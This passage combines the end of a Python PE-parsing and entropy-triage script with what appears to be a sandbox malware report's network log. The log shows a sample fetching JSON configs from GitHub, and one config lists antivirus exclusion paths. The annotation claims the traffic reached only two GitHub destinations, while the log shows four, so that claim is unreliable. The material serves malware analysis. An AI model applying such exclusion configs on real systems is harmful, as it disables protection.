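    text = (b"\xcc" * 16 + b"\x48\x31\xc0\xc3").ljust(file_align, b"\0")   # int3 pad; xor rax,rax; ret
    dbg = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))  # 4096 bytes
    layout = [(b".text", 0x14, 0x1000, text, 0x60000020),                  # CODE | EXECUTE | READ
              (b"/4", len(dbg), 0x2000, dbg, 0x42000040),                   # INITIALIZED_DATA | DISCARDABLE | READ
              (b".idata", 0x28, 0x3000, b"\0" * file_align, 0xC0000040)]    # INITIALIZED_DATA | READ | WRITE
    raw_ptr, sec_hdrs, bodies = file_align, b"", b""
    for name, vsize, va, raw, chars in layout:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        bodies += raw
        raw_ptr += len(raw)
    strtab = struct.pack("<I", 4 + 13) + b".zdebug_info\0"   # string table at raw_ptr; "/4" -> offset 4 (assumed name)
    dirs = [(0, 0)] * 16
    dirs[1] = (0x3000, 0x28)                                  # IMPORT directory lives in .idata
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 0, 0, len(text), len(bodies) - len(text), 0,
                      0x1010, 0x1000, 0x400000, sect_align, file_align, 6, 1, 0, 0, 6, 1, 0, 0x4000,
                      file_align, 0, 2, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)     # 112 + 16 * 8 = 240 bytes
    coff = struct.pack("<HHIIIHH", 0x8664, len(layout), 0, raw_ptr, 0, len(opt), 0x22)  # timestamp 0, no symbols
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    head = dos + b"PE\0\0" + coff + opt + sec_hdrs
    assert len(head) <= file_align
    return head.ljust(file_align, b"\0") + bodies + strtab


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print(f"PE32+={pe['is_64']} entry=0x{pe['entry']:x} in {section_for_rva(pe, pe['entry'])} "
          f"dllchars=0x{pe['dll_chars']:x}")
    for s in pe["sections"]:
        print(f"{s['name']:<13} va=0x{s['va']:06x} vsize=0x{s['vsize']:05x} entropy={s['entropy']:.3f}")
    for name, (rva, size) in pe["dirs"].items():
        if size:
            print(f"{name:<10} 0x{rva:x} 0x{size:x} {section_for_rva(pe, rva)}")
    print("\n".join(triage(pe)))
```

Run it on a real file with `parse_pe(open(path, "rb").read())`; the entropy column will then match the report's values for sections whose raw data is present on disk, and the /N names come back as the linker wrote them. The DISCARDABLE test is the one to keep in mind when reading entropy tables: a packer puts its high-entropy blob where the loader will map it and a stub will decrypt it, not in a section flagged to be thrown away.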
All traffic below is TCP/443 from the analysis VM (192.168.2.4) to two destinations. Both lie in address ranges GitHub publishes for its own services: 185.199.109.133 is in 185.199.108.0/22 (GitHub Pages and raw.githubusercontent.com) and 140.82.121.3 in 140.82.112.0/20 (github.com), so these TLS sessions are consistent with the sample retrieving content hosted on GitHub rather than contacting dedicated attacker infrastructure; the host names themselves are not visible at this layer.
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 27, 2024 12:55:06.375881910 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.375935078 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.376003027 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.377064943 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.377087116 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.845598936 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.845900059 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.845926046 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.846014023 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.846019983 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.847343922 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.847429991 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.896635056 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.896748066 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.896796942 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.944397926 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:06.944408894 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:06.992136955 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.092953920 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.093051910 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.093121052 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.093508959 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.093508959 CEST | 49730 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.093530893 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.093540907 CEST | 443 | 49730 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.094810963 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.094851017 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.094928026 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.095293999 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.095309019 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.567802906 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.568198919 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.568217039 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.568386078 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.568394899 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.569572926 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.569655895 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.588798046 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.588923931 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.588948965 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.634057045 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.634078979 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.680604935 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.696872950 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.696984053 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.697047949 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.702719927 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.702745914 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:07.702759027 CEST | 49731 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:07.702764988 CEST | 443 | 49731 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:34.070128918 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.070161104 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.070244074 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.071428061 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.071438074 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.718813896 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.719011068 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.719019890 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.719160080 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.719163895 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.720109940 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.720172882 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.742631912 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.742712975 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.742752075 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.784503937 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.789899111 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:34.789912939 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:34.837568998 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:35.146241903 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:35.146342039 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:35.146404028 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:35.146406889 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:35.146456957 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:35.146728992 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:35.146747112 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:35.146768093 CEST | 49738 | 443 | 192.168.2.4 | 140.82.121.3
Aug 27, 2024 12:55:35.146773100 CEST | 443 | 49738 | 140.82.121.3 | 192.168.2.4
Aug 27, 2024 12:55:35.148200035 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.148251057 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.148325920 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.148596048 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.148614883 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.600306988 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.600625992 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.600661039 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.600824118 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.600831032 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.601861000 CEST | 443 | 49739 | 185.199.109.133 | 192.168.2.4
Aug 27, 2024 12:55:35.601938009 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
Aug 27, 2024 12:55:35.603209019 CEST | 49739 | 443 | 192.168.2.4 | 185.199.109.133
                          Aug 27, 2024 12:55:35.603279114 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.603363037 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.603379011 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.651518106 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.990891933 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.990961075 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.990984917 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991008997 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991034031 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991065979 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991099119 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991110086 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991127014 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991137981 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991173029 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991192102 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991220951 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991236925 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991250992 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991291046 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991300106 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995649099 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995683908 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995718956 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.995748997 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995786905 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995819092 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.995831013 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995870113 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.996109962 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996180058 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996206045 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996233940 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.996247053 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996304035 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997010946 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997075081 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997106075 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997122049 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997139931 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997185946 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997977972 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998039961 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998069048 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998095036 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998111963 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998161077 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998167992 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998182058 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998224974 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998289108 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998303890 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998326063 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998331070 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:38.198266983 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.198319912 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.198400974 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.205292940 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.205307961 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.867611885 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.867721081 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.871855974 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.871869087 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.872183084 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.926866055 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497292995 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497356892 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497380972 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.725958109 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.725977898 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.726032019 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.726047039 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.726098061 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728382111 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728399992 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.728415012 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728420973 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:42.414951086 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.414990902 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:42.415065050 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.415326118 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.415343046 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.096940041 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.097238064 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.097270012 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.097528934 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.097537041 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.098613977 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.098684072 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099627972 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099713087 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099716902 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.144505024 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.147093058 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.147104979 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.194972038 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209078074 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209161997 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209330082 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209466934 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209491014 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209501982 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209506989 CEST4434974134.194.69.213192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Aug 27, 2024 12:55:06.365214109 CEST | 57284 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 27, 2024 12:55:06.372332096 CEST | 53 | 57284 | 1.1.1.1 | 192.168.2.4
                          Aug 27, 2024 12:55:34.057627916 CEST | 61621 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 27, 2024 12:55:34.069144964 CEST | 53 | 61621 | 1.1.1.1 | 192.168.2.4
                          Aug 27, 2024 12:55:42.405945063 CEST | 55049 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 27, 2024 12:55:42.414222002 CEST | 53 | 55049 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Aug 27, 2024 12:55:06.365214109 CEST | 192.168.2.4 | 1.1.1.1 | 0x417c | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:34.057627916 CEST | 192.168.2.4 | 1.1.1.1 | 0xd9c0 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:42.405945063 CEST | 192.168.2.4 | 1.1.1.1 | 0x24e5 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Aug 27, 2024 12:55:06.372332096 CEST | 1.1.1.1 | 192.168.2.4 | 0x417c | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:06.372332096 CEST | 1.1.1.1 | 192.168.2.4 | 0x417c | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:06.372332096 CEST | 1.1.1.1 | 192.168.2.4 | 0x417c | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:06.372332096 CEST | 1.1.1.1 | 192.168.2.4 | 0x417c | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:34.069144964 CEST | 1.1.1.1 | 192.168.2.4 | 0xd9c0 | No error (0) | github.com | - | 140.82.121.3 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:42.414222002 CEST | 1.1.1.1 | 192.168.2.4 | 0x24e5 | No error (0) | httpbin.org | - | 34.194.69.213 | A (IP address) | IN (0x0001) | false
                          Aug 27, 2024 12:55:42.414222002 CEST | 1.1.1.1 | 192.168.2.4 | 0x24e5 | No error (0) | httpbin.org | - | 3.211.178.193 | A (IP address) | IN (0x0001) | false
                          • raw.githubusercontent.com
                          • github.com
                          • https:
                          • 45.125.66.18
                          • httpbin.org
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49730 | 185.199.109.133 | 443 | 6120 | C:\Users\user\Desktop\1feP5qTCl0.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 10:55:06 UTC | 140 | OUT | GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:07 UTC | 898 | IN | HTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 254
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:07 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740041-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756107.962493,VS0,VE85
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: d39b10111035c8908acbe8569ca00bf09d26751f
                          Expires: Tue, 27 Aug 2024 11:00:07 GMT
                          Source-Age: 0
                          2024-08-27 10:55:07 UTC254INData Raw: 7b 0d 0a 20 20 22 66 6f 6c 64 65 72 5f 70 61 74 68 22 3a 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 22 61 64 64 5f 65 78 63 6c 75 73 69 6f 6e 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 22 65 78 63 6c 75 73 69 6f 6e 5f 70 61 74 68 73 22 3a 20 5b 0d 0a 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 63 6f 76 65 72 79 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 20 20 22 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 5c 44 65 73 6b 74 6f 70 22 0d 0a 20 20 5d 0d 0a 7d
                          Data Ascii: { "folder_path": "C:\\Reka", "add_exclusions": true, "exclusion_paths": [ "C:\\Users", "C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)", "C:\\Recovery", "C:\\Reka", "%USERPROFILE%\\Desktop" ]}


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49731 | 185.199.109.133 | 443 | 6120 | C:\Users\user\Desktop\1feP5qTCl0.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 10:55:07 UTC | 141 | OUT | GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:07 UTC | 899 | IN | HTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 271
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: F629:28EE07:6F5FBC:7AAC5E:66CDB08B
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:07 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740033-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756108.638641,VS0,VE13
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: ef55b381375abf973199a51bf520f32b818a71ee
                          Expires: Tue, 27 Aug 2024 11:00:07 GMT
                          Source-Age: 0
